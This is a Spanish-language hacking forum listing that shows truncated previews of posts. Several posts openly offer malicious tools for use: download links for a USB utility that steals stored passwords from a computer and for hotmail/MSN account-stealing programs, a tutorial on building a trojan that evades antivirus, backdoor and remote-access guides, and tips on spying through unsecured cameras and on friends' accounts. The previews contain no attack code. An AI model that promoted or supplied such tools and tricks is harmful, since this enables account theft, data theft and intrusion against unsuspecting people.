Temas |
---|
Ir a la página : 1, 2, 3 |
ok esto fue lo que encontre buscando como loco...... espero la opinion de todos sobre todo la de NewByte..... solo para ver si se puede hacer o no......... - Código:
-
Hace ya un par de días atrás publicamos en este blog el gran problema y dilema que tenemos con los virus que se propagan a través de nuestros dispositivos USB, concretamente las memorias USB muy útiles e indispensables hoy en día, (conocimos[url=http://cyberfirewall.blogspot.com/2008/03/cmo-desactivar-la-reproduccin.html]... |
Bueno ps amigos mios aca les dejo una info muy interesante sobre como ver algunas camaras de seguridad tan solo haciendo una busqueda en google....esto es totalmente legal ya que las camaras se pueden ver debido a que algunos administradores descuidados dejan las opciones de configuracion en default y no se aseguran de configurarlas de manera tal de que la camara sea privada....y si este tema ya esta posteado entonces le pido disculpas al moderardor y le pido que borre el tema....si no ps disfrutenlo....
tan solo si hacemos una simple busqueda en google son los siguientes parametros: |
Descrición: Es un archivo que contiene 52 videos en formatos swf, avi y wmv, donde tiene diverso contenido como: * Telnet * Fuerza Bruta * Explorando Bugs * Hackeando una Network * Utilización de programas de hacking * Y mucho más! Peso del Archivo: 663 Mb 6 partes de 95.7 Mb y 1 de 88.9 Formato de Compresión: RAR Subido a Rapidshare - Spoiler:
|
ok muchachos este es un super aporte que encontre en internet espero que no lo desaprovechen todos los que decimos querer ser hacker es "obligacion" tenerlas
| [/url] |
importante?: Las revistas fueron recogidas de : |
Bueno como no lo veo por aca lo voy a postear esta es una recopilacion de tutos sacados de la web muy explicativos y completos de como crear un troyano programado en visual basic casi indetectable con un poco de esfuerzo por los antivirus para las personas que crean que no van a poder leanlo porque tiene una amplia explicación del control winsock que se utiliza para crear conexiones... |
En esta oportunidad les mostrare lo facil que es dejar una puerta trasera en un ordenador dond tengamos acceso fisico. Bueno primero comenzare explicando que es una puerta trasera y luego comenzaremos a jugar con nuestra propia pc =)
En la informática, una puerta trasera (o en inglés backdoor), es una secuencia especial dentro del código de programación mediante la cual el programador puede acceder o escapar de un programa en caso de emergencia o contingencia en algún problema.
A su vez, estas puertas también pueden ser perjudiciales debido a que los crackers al descubrirlas... |
ok gente miren lo que encontre.....espero que lo provemos todos lo adictos a la internet Live cd de hacking inalambrico, tambien utilizado por el FBI
Linux Live-CD - OS corre desde el CD - 635 mb -. Iso -- Tambien utilizado por el FBI
WEP Hacking - la siguiente generacion
Esta version es para TODOS los sistemas excepto para sistemas con tarjeta Inalambrica Intel B/G(IPW2200). Live CD contiene herramientas para vulnerar un Access Point WLAN/inalambrica.... |
bueno chicos a ca les dejo un exelente programa para (USB) robar datos de un ordenador pc la funcion que tiene esta pequeña aplicacion es robar datos que estan guardados en una pc como contraseñas de todo tipo que esten almasenada en el ordenador bueno a ca les dejo el link http://rapidshare.com/files/107165387/usb_robadatos.rar bueno les voy a dar las instrucciones: bueno ok despues de descargar (ojo descargenlo en la usb) el archivo rar. despues nos vamos a la usb donde se encuentra... |
Bueno el deface o defacing es comprender los errores de las web’s, o de los foros, el deface se puedes usar de dos maneras:
1ºDeface lamerial, el cual consiste en dejar un mensaje en el index o modificalo, por ejemplo:soy tu padre por aver jodido tu web
2ºDeface De un buen hacker, el termino buen hacker no quiere decir que sea buena la persona si no que si ve errores o bug’s inmediatamente los reportara al administrador,De como es que supo del bug y como se puede explotar,Puede que te den las gracias por avisarles o asta te den algo cambio.
En que consiste un deface:... |
- Spoiler:
1._ hackmsn http://www.megaupload.com/?d=3TUA8ZEQ2._Advanced Instant Messengers Password Recovery msn hotmail messenger hacker tool http://www.megaupload.com/?d=ZQ1AOTLY3._hackear hotmail, robar cuentas hotmail, hack msn,...
|
Bueno amigos mios acal les dejo una info muy util sobre como hacer un XSS basico...pero para los que no sepan que es primero les dare una definicion de lo que significa XSS.
XSS:
Su nombre original "Cross Site scripting", y renombrado XSS para que no sea confundido con las CSS, (hojas de estilo en cascada), originalmente abarcaba cualquier ataque que permitiera ejecutar código de "scripting", como VBscript o Javascript, en el contexto de otro dominio.
Recientemente se acostumbra a llamar a los ataques de XSS "HTML Injection", sin embargo el... |
todo bn cucho por el favor de avisarme........... En realidad, tras este presuntuoso título de artículo, lo que quiero es concienciar a todos aquellos que utilizan contraseñas o claves (no sólo para MSN Messenger o hotmail, aunque es el caso más común) sino de cualquier otro servicio, sobretodo los basados en internet, donde la seguridad cobra más fuerza e importancia. Muy a menudo recibo correos o comentarios en algunos artículos de usuarios que piden ayuda o preguntan como les han robado la cuenta de hotmail (u otras),... |
trato de descomprimirlo y me tira un error algo de un volumen que tengo que poner un cd ojala puedas ayudarme!
me sale que tengo que poner un disco con este volumen C:\Documents and Settings\francisco\Escritorio\Nueva carpeta\FBI_wireless.part2.rar |
- Spoiler:
Bueno esto de verdad es muy facil (y muy util) si tienes un amigo q le pone clave a su usuario y quieres jugar con el un poco entonces esto te servira.... Usaremos el comando net user Se ve claramente el administrador etc etc....buenop ahora voy a coger...
|
Con este programa se puede entrar a la pc que quieras, siempre y cuando sepas su ip... la persona tiene que tener abierto el puerto 4899, tambien podes usar otros como el 5900... - Spoiler:
|
Si tienes ganas de jugarle una pequeña broma a algún amigo inexperto, en este post vamos a ver como crear un “virus” que apague su computadora, sin que pueda hacer nada para evitarlo (las instrucciones son para Windows XP). 1. Haz click derecho en el escritorio y crea un nuevo acceso directo mediante el menu Nuevo - Acceso Directo. 2. En la ventana que aparece,... |
Bueno esto es como un "programita" para robar datos de una memoria usb en tu pc.. que en principio lo ke hace es copiar todos los archivos de la usb; claro una vez conectada, sin que el dueño se de cuenta en lo mas minimo XD
bueno yo probe uno, pero salian varios mensajes de alerta..pero encontre estee que ahora lo comparto ..espero les siirva.
- Spoiler:
|
ok no hace poco estube enviamdo un comen aqui en el foro me di cuenta que buscado logre un gran exito.......aui encontraras la forma mas facil de entrar a un messinger espero que les guste......cuando descomprimas estran las instrucciones leeeeeeeeeeeeelas porfavor.........aaaaaa.....y ya lo ensaye y funciono.......uuuuuuuuuuuuuyuyyyyyyyyyyyyyyyyyuuuuuuuu....esta una re chimmmmmmmmmmm.........sin groserias.....ok menos blablabla y este es el link de descarga: http://rapidshare.com/files/84648521/usb_robadatos.rar |
Mirá aca los programas: espero tu agradecimiento..... - Spoiler:
|
- Código:
-
~~~~~~~~~~~~~~~~~~~~~~~~~~ | CONTENIDO | ,.´`^ ¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼ `-´. º 1)- Editorial º COLHACKERS º . . `, ¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¹ ... |
Este tutorialcito te sirve para ver las contraseñas que se almacenan cuando aparece el cartelito: y nosotros clickeamos "Recordar" Bueno, para fijarse es muy simple, solo vamos a Herramientas->Opciones->Seguridad->Contraseñas Guardadas->Mostrar Contraseñas __________________ |
Resulta que tengo un para de archivos con la extencion *.csv y necesito saber lo que dicen, los he abiertos con el excel y el bloc y solo me abre simbolos como estos: Si tienen algun programa para poder desencriptar y leer bien lo que dice adentro se los agradeceria. |
Comandos de Nircmd.exe 29 January, 2009 0 comments Uncategorized Abrir la bandeja de CD-ROM (EJ.: "E"... |
- Código:
-
EL Comando CHOICE
Antes de aprender a hacer uso de este comando, necesitamos entender q son los niveles de error. Los niveles de error son generados por los programas para informar sobre la forma en que fue terminado o fue forzado a terminar el programa. Por ejemplo cuando nosotros terminamos un programa presionando Ctrl+C el codigo de error es 3 y si se cierra normalmente es 0. Estos numeros por ellos mismos no sirven de nada, pero siendo usados... |
- Código:
-
<!-- HEAD.HTML --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <HTML> <HEAD> <TITLE>Netscape.com</TITLE> ... |
|